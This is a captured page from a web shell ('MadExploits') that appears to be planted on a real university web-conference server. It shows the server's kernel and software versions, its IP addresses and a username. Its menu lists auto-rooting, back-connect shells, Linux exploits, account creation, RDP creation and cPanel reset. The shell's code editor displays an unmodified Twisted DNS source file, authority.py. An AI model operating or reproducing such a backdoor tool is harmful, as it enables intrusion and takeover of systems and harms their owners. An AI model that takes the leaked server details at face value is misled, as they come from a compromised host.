Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.217.118.156
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
twisted /
names /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
__init__.py
452
B
-rw-r--r--
_rfc1982.py
8.9
KB
-rw-r--r--
authority.py
16.14
KB
-rw-r--r--
cache.py
3.71
KB
-rw-r--r--
client.py
23.45
KB
-rw-r--r--
common.py
7.68
KB
-rw-r--r--
dns.py
89.13
KB
-rw-r--r--
error.py
2.01
KB
-rw-r--r--
hosts.py
4.42
KB
-rw-r--r--
resolve.py
3.28
KB
-rw-r--r--
root.py
12.16
KB
-rw-r--r--
secondary.py
5.94
KB
-rw-r--r--
server.py
21.78
KB
-rw-r--r--
srvconnect.py
8.93
KB
-rw-r--r--
tap.py
4.72
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : authority.py
# -*- test-case-name: twisted.names.test.test_names -*- # Copyright (c) Twisted Matrix Laboratories. # See LICENSE for details. """ Authoritative resolvers. """ from __future__ import absolute_import, division import os import time from twisted.names import dns, error, common from twisted.internet import defer from twisted.python import failure from twisted.python.compat import execfile, nativeString, _PY3 from twisted.python.filepath import FilePath def getSerial(filename='/tmp/twisted-names.serial'): """ Return a monotonically increasing (across program runs) integer. State is stored in the given file. If it does not exist, it is created with rw-/---/--- permissions. @param filename: Path to a file that is used to store the state across program runs. @type filename: L{str} @return: a monotonically increasing number @rtype: L{str} """ serial = time.strftime('%Y%m%d') o = os.umask(0o177) try: if not os.path.exists(filename): with open(filename, 'w') as f: f.write(serial + ' 0') finally: os.umask(o) with open(filename, 'r') as serialFile: lastSerial, zoneID = serialFile.readline().split() zoneID = (lastSerial == serial) and (int(zoneID) + 1) or 0 with open(filename, 'w') as serialFile: serialFile.write('%s %d' % (serial, zoneID)) serial = serial + ('%02d' % (zoneID,)) return serial class FileAuthority(common.ResolverBase): """ An Authority that is loaded from a file. @ivar _ADDITIONAL_PROCESSING_TYPES: Record types for which additional processing will be done. @ivar _ADDRESS_TYPES: Record types which are useful for inclusion in the additional section generated during additional processing. @ivar soa: A 2-tuple containing the SOA domain name as a L{bytes} and a L{dns.Record_SOA}. """ # See https://twistedmatrix.com/trac/ticket/6650 _ADDITIONAL_PROCESSING_TYPES = (dns.CNAME, dns.MX, dns.NS) _ADDRESS_TYPES = (dns.A, dns.AAAA) soa = None records = None def __init__(self, filename): common.ResolverBase.__init__(self) self.loadFile(filename) self._cache = {} def __setstate__(self, state): self.__dict__ = state def _additionalRecords(self, answer, authority, ttl): """ Find locally known information that could be useful to the consumer of the response and construct appropriate records to include in the I{additional} section of that response. Essentially, implement RFC 1034 section 4.3.2 step 6. @param answer: A L{list} of the records which will be included in the I{answer} section of the response. @param authority: A L{list} of the records which will be included in the I{authority} section of the response. @param ttl: The default TTL for records for which this is not otherwise specified. @return: A generator of L{dns.RRHeader} instances for inclusion in the I{additional} section. These instances represent extra information about the records in C{answer} and C{authority}. """ for record in answer + authority: if record.type in self._ADDITIONAL_PROCESSING_TYPES: name = record.payload.name.name for rec in self.records.get(name.lower(), ()): if rec.TYPE in self._ADDRESS_TYPES: yield dns.RRHeader( name, rec.TYPE, dns.IN, rec.ttl or ttl, rec, auth=True) def _lookup(self, name, cls, type, timeout=None): """ Determine a response to a particular DNS query. @param name: The name which is being queried and for which to lookup a response. @type name: L{bytes} @param cls: The class which is being queried. Only I{IN} is implemented here and this value is presently disregarded. @type cls: L{int} @param type: The type of records being queried. See the types defined in L{twisted.names.dns}. @type type: L{int} @param timeout: All processing is done locally and a result is available immediately, so the timeout value is ignored. @return: A L{Deferred} that fires with a L{tuple} of three sets of response records (to comprise the I{answer}, I{authority}, and I{additional} sections of a DNS response) or with a L{Failure} if there is a problem processing the query. """ cnames = [] results = [] authority = [] additional = [] default_ttl = max(self.soa[1].minimum, self.soa[1].expire) domain_records = self.records.get(name.lower()) if domain_records: for record in domain_records: if record.ttl is not None: ttl = record.ttl else: ttl = default_ttl if (record.TYPE == dns.NS and name.lower() != self.soa[0].lower()): # NS record belong to a child zone: this is a referral. As # NS records are authoritative in the child zone, ours here # are not. RFC 2181, section 6.1. authority.append( dns.RRHeader( name, record.TYPE, dns.IN, ttl, record, auth=False ) ) elif record.TYPE == type or type == dns.ALL_RECORDS: results.append( dns.RRHeader( name, record.TYPE, dns.IN, ttl, record, auth=True ) ) if record.TYPE == dns.CNAME: cnames.append( dns.RRHeader( name, record.TYPE, dns.IN, ttl, record, auth=True ) ) if not results: results = cnames # Sort of https://tools.ietf.org/html/rfc1034#section-4.3.2 . # See https://twistedmatrix.com/trac/ticket/6732 additionalInformation = self._additionalRecords( results, authority, default_ttl) if cnames: results.extend(additionalInformation) else: additional.extend(additionalInformation) if not results and not authority: # Empty response. Include SOA record to allow clients to cache # this response. RFC 1034, sections 3.7 and 4.3.4, and RFC 2181 # section 7.1. authority.append( dns.RRHeader( self.soa[0], dns.SOA, dns.IN, ttl, self.soa[1], auth=True ) ) return defer.succeed((results, authority, additional)) else: if dns._isSubdomainOf(name, self.soa[0]): # We may be the authority and we didn't find it. # XXX: The QNAME may also be in a delegated child zone. See # #6581 and #6580 return defer.fail( failure.Failure(dns.AuthoritativeDomainError(name)) ) else: # The QNAME is not a descendant of this zone. Fail with # DomainError so that the next chained authority or # resolver will be queried. return defer.fail(failure.Failure(error.DomainError(name))) def lookupZone(self, name, timeout=10): if self.soa[0].lower() == name.lower(): # Wee hee hee hooo yea default_ttl = max(self.soa[1].minimum, self.soa[1].expire) if self.soa[1].ttl is not None: soa_ttl = self.soa[1].ttl else: soa_ttl = default_ttl results = [ dns.RRHeader( self.soa[0], dns.SOA, dns.IN, soa_ttl, self.soa[1], auth=True ) ] for (k, r) in self.records.items(): for rec in r: if rec.ttl is not None: ttl = rec.ttl else: ttl = default_ttl if rec.TYPE != dns.SOA: results.append( dns.RRHeader( k, rec.TYPE, dns.IN, ttl, rec, auth=True ) ) results.append(results[0]) return defer.succeed((results, (), ())) return defer.fail(failure.Failure(dns.DomainError(name))) def _cbAllRecords(self, results): ans, auth, add = [], [], [] for res in results: if res[0]: ans.extend(res[1][0]) auth.extend(res[1][1]) add.extend(res[1][2]) return ans, auth, add class PySourceAuthority(FileAuthority): """ A FileAuthority that is built up from Python source code. """ def loadFile(self, filename): g, l = self.setupConfigNamespace(), {} execfile(filename, g, l) if 'zone' not in l: raise ValueError("No zone defined in " + filename) self.records = {} for rr in l['zone']: if isinstance(rr[1], dns.Record_SOA): self.soa = rr self.records.setdefault(rr[0].lower(), []).append(rr[1]) def wrapRecord(self, type): return lambda name, *arg, **kw: (name, type(*arg, **kw)) def setupConfigNamespace(self): r = {} items = dns.__dict__.iterkeys() for record in [x for x in items if x.startswith('Record_')]: type = getattr(dns, record) f = self.wrapRecord(type) r[record[len('Record_'):]] = f return r class BindAuthority(FileAuthority): """ An Authority that loads U{BIND zone files <https://en.wikipedia.org/wiki/Zone_file>}. Supports only C{$ORIGIN} and C{$TTL} directives. """ def loadFile(self, filename): """ Load records from C{filename}. @param filename: file to read from @type filename: L{bytes} """ fp = FilePath(filename) # Not the best way to set an origin. It can be set using $ORIGIN # though. self.origin = nativeString(fp.basename() + b'.') lines = fp.getContent().splitlines(True) lines = self.stripComments(lines) lines = self.collapseContinuations(lines) self.parseLines(lines) def stripComments(self, lines): """ Strip comments from C{lines}. @param lines: lines to work on @type lines: iterable of L{bytes} @return: C{lines} sans comments. """ return ( a.find(b';') == -1 and a or a[:a.find(b';')] for a in [ b.strip() for b in lines ] ) def collapseContinuations(self, lines): """ Transform multiline statements into single lines. @param lines: lines to work on @type lines: iterable of L{bytes} @return: iterable of continuous lines """ l = [] state = 0 for line in lines: if state == 0: if line.find(b'(') == -1: l.append(line) else: l.append(line[:line.find(b'(')]) state = 1 else: if line.find(b')') != -1: l[-1] += b' ' + line[:line.find(b')')] state = 0 else: l[-1] += b' ' + line return filter(None, (line.split() for line in l)) def parseLines(self, lines): """ Parse C{lines}. @param lines: lines to work on @type lines: iterable of L{bytes} """ ttl = 60 * 60 * 3 origin = self.origin self.records = {} for line in lines: if line[0] == b'$TTL': ttl = dns.str2time(line[1]) elif line[0] == b'$ORIGIN': origin = line[1] elif line[0] == b'$INCLUDE': raise NotImplementedError('$INCLUDE directive not implemented') elif line[0] == b'$GENERATE': raise NotImplementedError( '$GENERATE directive not implemented' ) else: self.parseRecordLine(origin, ttl, line) # If the origin changed, reflect that within the instance. self.origin = origin def addRecord(self, owner, ttl, type, domain, cls, rdata): """ Add a record to our authority. Expand domain with origin if necessary. @param owner: origin? @type owner: L{bytes} @param ttl: time to live for the record @type ttl: L{int} @param domain: the domain for which the record is to be added @type domain: L{bytes} @param type: record type @type type: L{str} @param cls: record class @type cls: L{str} @param rdata: record data @type rdata: L{list} of L{bytes} """ if not domain.endswith(b'.'): domain = domain + b'.' + owner[:-1] else: domain = domain[:-1] f = getattr(self, 'class_%s' % (cls,), None) if f: f(ttl, type, domain, rdata) else: raise NotImplementedError( "Record class %r not supported" % (cls,) ) def class_IN(self, ttl, type, domain, rdata): """ Simulate a class IN and recurse into the actual class. @param ttl: time to live for the record @type ttl: L{int} @param type: record type @type type: str @param domain: the domain @type domain: bytes @param rdata: @type rdate: bytes """ record = getattr(dns, 'Record_%s' % (nativeString(type),), None) if record: r = record(*rdata) r.ttl = ttl self.records.setdefault(domain.lower(), []).append(r) if type == 'SOA': self.soa = (domain, r) else: raise NotImplementedError( "Record type %r not supported" % (nativeString(type),) ) def parseRecordLine(self, origin, ttl, line): """ Parse a C{line} from a zone file respecting C{origin} and C{ttl}. Add resulting records to authority. @param origin: starting point for the zone @type origin: L{bytes} @param ttl: time to live for the record @type ttl: L{int} @param line: zone file line to parse; split by word @type line: L{list} of L{bytes} """ if _PY3: queryClasses = set( qc.encode("ascii") for qc in dns.QUERY_CLASSES.values() ) queryTypes = set( qt.encode("ascii") for qt in dns.QUERY_TYPES.values() ) else: queryClasses = set(dns.QUERY_CLASSES.values()) queryTypes = set(dns.QUERY_TYPES.values()) markers = queryClasses | queryTypes cls = b'IN' owner = origin if line[0] == b'@': line = line[1:] owner = origin elif not line[0].isdigit() and line[0] not in markers: owner = line[0] line = line[1:] if line[0].isdigit() or line[0] in markers: domain = owner owner = origin else: domain = line[0] line = line[1:] if line[0] in queryClasses: cls = line[0] line = line[1:] if line[0].isdigit(): ttl = int(line[0]) line = line[1:] elif line[0].isdigit(): ttl = int(line[0]) line = line[1:] if line[0] in queryClasses: cls = line[0] line = line[1:] type = line[0] rdata = line[1:] self.addRecord( owner, ttl, nativeString(type), domain, nativeString(cls), rdata )
Close